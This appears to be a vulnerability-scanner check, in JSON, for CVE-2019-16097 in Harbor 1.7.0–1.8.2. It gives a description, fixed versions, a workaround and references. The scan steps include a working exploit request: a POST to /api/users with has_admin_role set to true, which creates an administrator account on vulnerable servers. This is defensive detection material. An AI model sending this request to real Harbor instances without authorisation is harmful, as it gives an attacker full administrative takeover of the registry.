{ "Name": "Harbor Remote Privilege Escalation Vulnerability (CVE-2019-16097)", "Description": "core/api/user.go in Harbor 1.7.0 through 1.8.2 allows non-admin users to create admin accounts via the POST /api/users API when Harbor is set up with DB as the authentication backend and allows users to self-register. Fixed versions: v1.7.6, v1.8.3 and v1.9.0. Workaround without applying the fix: configure Harbor to use a non-DB authentication backend such as LDAP.", "Product": "Harbor", "Homepage": "https://goharbor.io", "DisclosureDate": "2019-09-08", "Author": "gobysec@gmail.com", "FofaQuery": "", "GobyQuery": "app=\"Harbor\"", "Level": "3", "Impact": "It allows remote non-administrative users to take over the Harbor repository by creating an administrator account through the addition of specific parameters to the POST /api/users request.", "Recommendation": "The Harbor team and VMware have both released fixed versions. Users are advised to upgrade to one of them (see the release links under References) for immediate protection against this vulnerability. Note that on a vulnerable instance the scan step of this check registers a test account (username z1z1z1) with has_admin_role set; after scanning, review the Harbor user list and remove that account.", "References": [ "http://www.vmware.com/security/advisories/VMSA-2019-0015.html", "https://github.com/goharbor/harbor/commit/b6db8a8a106259ec9a2c48be8a380cb3b37cf517", "https://github.com/goharbor/harbor/compare/v1.8.2...v1.9.0-rc1", "https://github.com/goharbor/harbor/releases/tag/v1.7.6", "https://github.com/goharbor/harbor/releases/tag/v1.8.3", "https://unit42.paloaltonetworks.com/critical-vulnerability-in-harbor-enables-privilege-escalation-from-zero-to-admin-cve-2019-16097/", "https://nvd.nist.gov/vuln/detail/CVE-2019-16097", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16097" ], "HasExp": false, "ExpParams": null, "ExpTips": { "Type": "", "Content": "" }, "ScanSteps": [ "AND", { "Request": { "data": "", "data_type": "text", "follow_redirect": false, "method": "GET", "uri": "/api/systeminfo", "header": { "Accept": "*/*", "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 
Firefox/60.0" } }, "ResponseTest": { "checks": [ { "bz": "", "operation": "==", "type": "item", "value": "200", "variable": "$code" }, { "bz": "", "operation": "regex", "type": "item", "value": "harbor_version.*?v1\\.(7\\.[0-5]|8\\.[0-2])[-\"]", "variable": "$body" } ], "operation": "AND", "type": "group" } }, { "Request": { "data": "{\"username\":\"z1z1z1\",\"email\":\"z1z1z1@gmail.com\",\"realname\":\"z1z1z1\",\"password\":\"Password123\",\"comment\":\"test\",\"has_admin_role\":true}", "data_type": "text", "follow_redirect": false, "method": "POST", "uri": "/api/users", "header": { "Content-Type": "application/json", "Referer": "{{{fixedhostinfo}}}", "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0" } }, "ResponseTest": { "checks": [ { "bz": "", "operation": "==", "type": "item", "value": "201", "variable": "$code" }, { "type": "group", "operation": "AND", "checks": [ { "bz": "", "operation": "==", "type": "item", "value": "409", "variable": "$code" }, { "bz": "", "operation": "contains", "type": "item", "value": "username has already been used!", "variable": "$body" } ] } ], "operation": "OR", "type": "group" } } ], "ExploitSteps": null, "Tags": null, "CVEIDs": [ "CVE-2019-16097" ], "CVSSScore": "6.5", "AttackSurfaces": { "Application": ["Harbor"], "Support": null, "Service": null, "System": null, "Hardware": null }, "Disable": false }